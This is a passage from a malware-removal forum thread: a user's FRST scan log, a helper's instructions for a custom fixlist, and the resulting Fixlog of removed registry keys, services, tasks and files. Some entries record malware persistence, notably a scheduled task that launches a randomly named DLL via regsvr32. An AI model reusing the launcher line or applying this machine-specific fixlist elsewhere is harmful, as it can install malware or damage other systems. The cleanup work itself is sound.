Faulting module path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\StartUI.dll
Report Id: d71a9e05-9bd3-4b5b-a994-de7e7c001d4d
Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App

Error: (02/11/2017 06:34:19 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: ShellExperienceHost.exe, version: 10.0.10586.494, time stamp: 0x5775e94c
Faulting module name: StartUI.dll, version: 10.0.10586.494, time stamp: 0x5775e851
Exception code: 0xc0000005
Fault offset: 0x00000000002990c8
Faulting process id: 0x164c
Faulting application start time: 0x01d284d68cb9af7b
Faulting application path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Faulting module path: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\StartUI.dll
Report Id: ec43ee36-371d-46ad-9a3e-6420d8f1090f
Faulting package full name: Microsoft.Windows.ShellExperienceHost_10.0.10586.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: App

Error: (02/11/2017 06:15:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPWMISVC.exe, version: 2.5.3.0, time stamp: 0x4ed4a2e7
Faulting module name: OLEAUT32.dll, version: 10.0.10586.0, time stamp: 0x5632d5ee
Exception code: 0xc0000005
Fault offset: 0x00019ca4
Faulting process id: 0x8bc
Faulting application start time: 0x01d284d592f3ce57
Faulting application path: C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
Faulting module path: C:\WINDOWS\SYSTEM32\OLEAUT32.dll
Report Id: 1e3afce1-5f63-4fab-87be-d8a4547a490b
Faulting package full name:
Faulting package-relative application ID:

Error: (02/11/2017 06:13:14 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (02/11/2017 06:03:15 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Explorer.EXE, version: 10.0.10586.494, time stamp: 0x5775e575
Faulting module name: ntdll.dll, version: 10.0.10586.306, time stamp: 0x571af2eb
Exception code: 0xc0000005
Fault offset: 0x000000000002e909
Faulting process id: 0x108c
Faulting application start time: 0x01d284c853f519a8
Faulting application path: C:\WINDOWS\Explorer.EXE
Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
Report Id: fec2c750-0488-4aae-8404-979553ef3ed8
Faulting package full name:
Faulting package-relative application ID:

Error: (02/11/2017 04:46:07 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program explorer.exe version 10.0.10586.494 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: 108c

Start Time: 01d284c853f519a8

Termination Time: 4294967295

Application Path: C:\Windows\explorer.exe

Report Id: 96c7338a-f0bc-11e6-93cf-74e543244a4e

Faulting package full name:

Faulting package-relative application ID:

Error: (02/11/2017 04:40:20 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: HPWMISVC.exe, version: 2.5.3.0, time stamp: 0x4ed4a2e7
Faulting module name: OLEAUT32.dll, version: 10.0.10586.0, time stamp: 0x5632d5ee
Exception code: 0xc0000005
Fault offset: 0x00019ca4
Faulting process id: 0x8c8
Faulting application start time: 0x01d284c847f24e22
Faulting application path: C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
Faulting module path: C:\WINDOWS\SYSTEM32\OLEAUT32.dll
Report Id: 1ceb18d1-6b41-4b14-be5b-ddf439946858
Faulting package full name:
Faulting package-relative application ID:

Error: (02/11/2017 04:38:03 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed

Error: (02/11/2017 04:36:14 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HP-RRR)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (02/11/2017 02:58:44 PM) (Source: ATIeRecord) (EventID: 16396) (User: )
Description: ATI EEU PnP start/stop failed


System errors:
=============
Error: (02/11/2017 07:49:56 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0xc1900107: Feature update to Windows 10, version 1607.

Error: (02/11/2017 07:04:51 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0xc1900107: Feature update to Windows 10, version 1607.

Error: (02/11/2017 06:16:10 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HPWMISVC service terminated unexpectedly. It has done this 1 time(s).

Error: (02/11/2017 06:15:43 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NetPipeActivator service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The NetMsmqActivator service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the NetPipeActivator service to connect.

Error: (02/11/2017 06:13:55 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the NetMsmqActivator service to connect.

Error: (02/11/2017 06:13:18 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NetTcpActivator service depends on the NetTcpPortSharing service which failed to start because of the following error:
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Error: (02/11/2017 06:11:52 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80010108: Cumulative Update for Windows 10 Version 1511 for x64-based Systems (KB3210721).


CodeIntegrity:
===================================
Date: 2017-02-11 19:04:30.883
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2017-02-11 17:48:59.390
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 17:48:59.349
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 17:48:59.202
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 14:49:28.187
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 14:49:28.103
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-11 14:49:27.995
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:27.004
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.969
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-02-10 21:52:26.908
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: AMD A6-4400M APU with Radeon(tm) HD Graphics
Percentage of memory in use: 49%
Total physical RAM: 3561.36 MB
Available physical RAM: 1782.79 MB
Total Virtual: 7145.36 MB
Available Virtual: 4789.45 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:445.3 GB) (Free:387.17 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (Recovery) (Fixed) (Total:20.16 GB) (Free:2.14 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: (86489) (CDROM) (Total:7.39 GB) (Free:0 GB) UDF

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 915B52F3)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=445.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=20.2 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================

 

[Broni]

Download attached fixlist.txt file and save it to the Desktop.
NOTE. It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST(FRST64) and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

[glhglh]

Fix result of Farbar Recovery Scan Tool (x64) Version: 12-02-2017
Ran by Randy (11-02-2017 21:03:06) Run:2
Running from C:\Users\Randy\Desktop\Virus
Loaded Profiles: Randy (Available Profiles: Randy & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
HKLM-x32\...\Run: [] => [X]
ShellIconOverlayIdentifiers-x32: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
ShellIconOverlayIdentifiers-x32: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_32.dll -> No File
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
Toolbar: HKU\S-1-5-21-2783097096-289569773-1546617986-1001 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-12-11] <==== ATTENTION (Points to *.cfg file)
U3 idsvc; no ImagePath
U3 wpcsvc; no ImagePath
2016-08-08 20:54 - 2017-02-10 21:18 - 0000115 _____ () C:\Users\Randy\AppData\Roaming\LogFile.txt
2016-06-19 06:26 - 2016-06-19 06:26 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb0.dat
2016-06-10 06:41 - 2016-06-10 06:41 - 2049556 _____ () C:\Users\Randy\AppData\Roaming\sb203.dat
2016-02-17 11:41 - 2016-08-05 17:41 - 0000228 _____ () C:\Users\Randy\AppData\Roaming\WB.CFG
2015-11-15 15:05 - 2015-11-15 15:05 - 0002560 _____ () C:\Users\Randy\AppData\Local\uninstall.exe
2015-01-27 15:51 - 2015-01-27 15:51 - 0000057 _____ () C:\ProgramData\Ament.ini
2016-08-08 22:40 - 2016-08-08 22:41 - 8464000 _____ (SpeedyPC Software Inc.) C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe
Task: {02838A17-EB1E-41DC-A610-4FACFC9CFC90} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} - System32\Tasks\JZIP => C:\Program Files (x86)\JZIP\JZIP\JZIP.exe <==== ATTENTION
Task: {0CBCDC29-56A3-4015-A06E-8FD4AABD553B} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {1E0973D5-7653-49B7-B013-63DB348A9012} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {1EAE785B-1358-435B-86E7-5860D0FEE3D6} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {2C627394-07F4-4001-84C6-96DA554AC5A0} - \IBUpd -> No File <==== ATTENTION
Task: {477A9893-3F9C-40B5-ADA0-FC96EE6735EC} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {49E80698-374B-426E-BD1D-E0ECDA6BD4A4} - \SwiftSearch Auto Updater 1.10.0.25 Core -> No File <==== ATTENTION
Task: {4CD1D841-791C-485F-9229-FDD5EE9C27CF} - System32\Tasks\SpeedyBackup reigistration schedule startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {4D2E3B92-6CEE-4C6C-82C1-BF7C4B59FE7E} - \systemmgr -> No File <==== ATTENTION
Task: {5840CBCE-7F77-411E-B033-1C1AF189ADB5} - \1f308483-1a6e-493d-ae8f-5dd8634c5004-4 -> No File <==== ATTENTION
Task: {69480AF7-F603-4EA8-8F93-EA6B8C01E138} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {766E1EC9-58D6-40FB-BAC5-6BD45B994FC5} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {89FF84C6-2FF3-4ADC-9311-2162837E1C22} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {934CAF6C-AD19-40B5-8ACE-AC40D21BBF28} - System32\Tasks\{0532BE32-87D9-B0CA-75BD-6DEE5839A94C} => Regsvr32.exe /s /n /I:"/rt" "C:\PROGRA~3\261dc3b1\57c348f3.dll" <==== ATTENTION
Task: {A433E40E-B066-4216-A8FB-2E412069CE29} - System32\Tasks\SpeedyBackup Startup => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {B1619F2B-5CE9-4EC5-A3E5-FD048FF487E4} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {B7731159-01AA-4BAF-8508-D5D744AB61D2} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {C6518B78-A01B-4FE6-8AF0-38C0BBF48E58} - \SwiftSearch Auto Updater 1.10.0.25 Pending Update -> No File <==== ATTENTION
Task: {D6F2BC1F-773E-4624-9FAA-578BE389CD0E} - System32\Tasks\SpeedyBackup reigistration schedule => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe <==== ATTENTION
Task: {E1DEA695-EE7F-4FB6-A4F0-EB278B1FD47B} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E6542D06-DBEF-4690-A07E-F59316EEB423} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {F2EF1CA8-784E-427A-A1D4-97AEB2EB4A85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {FA4F0A0E-8234-469C-B0EB-2375D63F521A} - \Inst_Rep -> No File <==== ATTENTION
Task: {FFCE8EEA-7117-44A9-8BD4-0C6EA5CEE61E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\NNKcNIsK9b1hl0VgyglYTRwSD.job => C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe <==== ATTENTION
C:\Users\Randy\AppData\Roaming\NNKcNIsK9b1hl0VgyglYTRwSD.exe
Task: C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SpeedyPC Software\UUS3\SpeedyPC_Update3.exe <==== ATTENTION
C:\Program Files (x86)\Common Files\SpeedyPC Software
(SpeedyPC Software) C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe
C:\Program Files (x86)\SpeedyPC Software
ShellIconOverlayIdentifiers: [ CustomFolderNotSynced] -> {4008A679-BE48-456D-A32E-97DE3F48E10D} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ CustomFolderSynced] -> {4DD1429E-055B-4585-9E4D-614252FD7FC1} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileNotSynced] -> {267973DC-2B3C-41CE-93F1-D2C5CCC06663} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FileSynced] -> {DBD42211-56CD-4C08-A3E4-48ED07AD7759} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderExcluded] -> {43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderNotSynced] -> {3E2576B1-5B08-47DE-8803-95C6ECA734EE} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
ShellIconOverlayIdentifiers: [ FolderSynced] -> {2858A960-566F-45CF-951E-4B3099E70E6F} => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupOverlay_64.dll [2016-05-06] (SpeedyPC Software)
R2 BackupService; C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\BackupService.exe [247808 2016-05-06] (SpeedyPC Software) [File not signed]
2017-02-11 20:20 - 2016-08-08 22:41 - 00000512 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job
2017-02-11 18:15 - 2016-08-08 22:41 - 00000496 _____ C:\WINDOWS\Tasks\SpeedyBackup Startup.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000530 _____ C:\WINDOWS\Tasks\SpeedyPC Update Version3 Startup Task.job
2017-02-11 18:13 - 2016-08-08 22:41 - 00000522 _____ C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup reigistration schedule.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe
Task: C:\WINDOWS\Tasks\SpeedyBackup Startup.job => C:\Program Files (x86)\SpeedyPC Software\SpeedyBackup\SpeedyBackup.exe

*****************

HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderNotSynced => key not found.
HKCR\Wow6432Node\CLSID\{4008A679-BE48-456D-A32E-97DE3F48E10D} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ CustomFolderSynced => key not found.
HKCR\Wow6432Node\CLSID\{4DD1429E-055B-4585-9E4D-614252FD7FC1} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileNotSynced => key not found.
HKCR\Wow6432Node\CLSID\{267973DC-2B3C-41CE-93F1-D2C5CCC06663} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FileSynced => key not found.
HKCR\Wow6432Node\CLSID\{DBD42211-56CD-4C08-A3E4-48ED07AD7759} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderExcluded => key not found.
HKCR\Wow6432Node\CLSID\{43BAE28F-4AC6-4C1F-9A86-E0D8533370BC} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderNotSynced => key not found.
HKCR\Wow6432Node\CLSID\{3E2576B1-5B08-47DE-8803-95C6ECA734EE} => key not found.
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ FolderSynced => key not found.
HKCR\Wow6432Node\CLSID\{2858A960-566F-45CF-951E-4B3099E70E6F} => key not found.
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\SOFTWARE\Policies\Microsoft\Internet Explorer => key removed successfully
HKU\S-1-5-21-2783097096-289569773-1546617986-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => value removed successfully
HKCR\CLSID\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} => key not found.
HKLM\Software\Wow6432Node\MozillaPlugins\@WildTangent.com/GamesAppPresenceDetector,Version=1.0 => key removed successfully
C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js => moved successfully
HKLM\System\CurrentControlSet\Services\idsvc => key removed successfully
idsvc => service removed successfully
HKLM\System\CurrentControlSet\Services\wpcsvc => key removed successfully
wpcsvc => service removed successfully
C:\Users\Randy\AppData\Roaming\LogFile.txt => moved successfully
C:\Users\Randy\AppData\Roaming\sb0.dat => moved successfully
C:\Users\Randy\AppData\Roaming\sb203.dat => moved successfully
C:\Users\Randy\AppData\Roaming\WB.CFG => moved successfully
C:\Users\Randy\AppData\Local\uninstall.exe => moved successfully
C:\ProgramData\Ament.ini => moved successfully
C:\Users\Randy\AppData\Local\Temp\OMD5938.tmp.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{02838A17-EB1E-41DC-A610-4FACFC9CFC90} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{02838A17-EB1E-41DC-A610-4FACFC9CFC90} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{085C37EA-1E33-4C9E-87B8-3E576F3FE4AB} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0B0B1AAD-0AF0-4618-BDEF-CDDEDF582AD0} => key removed successfully
C:\WINDOWS\System32\Tasks\JZIP => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\JZIP => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0CBCDC29-56A3-4015-A06E-8FD4AABD553B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0CBCDC29-56A3-4015-A06E-8FD4AABD553B} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SmartWeb Upgrade Trigger Task => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E0973D5-7653-49B7-B013-63DB348A9012} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E0973D5-7653-49B7-B013-63DB348A9012} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ShopperProJSUpd => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1EAE785B-1358-435B-86E7-5860D0FEE3D6} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1EAE785B-1358-435B-86E7-5860D0FEE3D6} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2C627394-07F4-4001-84C6-96DA554AC5A0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C627394-07F4-4001-84C6-96DA554AC5A0} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\IBUpd => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{477A9893-3F9C-40B5-ADA0-FC96EE6735EC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{477A9893-3F9C-40B5-ADA0-FC96EE6735EC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{49E80698-374B-426E-BD1D-E0ECDA6BD4A4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49E80698-374B-426E-BD1D-E0ECDA6BD4A4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SwiftSearch Auto Updater 1.10.0.25 Core => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4CD1D841-791C-485F-9229-FDD5EE9C27CF} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4CD1D841-791C-485F-9229-FDD5EE9C27CF} => key removed successfully
C:\WINDOWS\System32\Tasks\SpeedyBackup reigistration schedule startup => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpeedyBackup reigistration schedule startup => key removed successfully
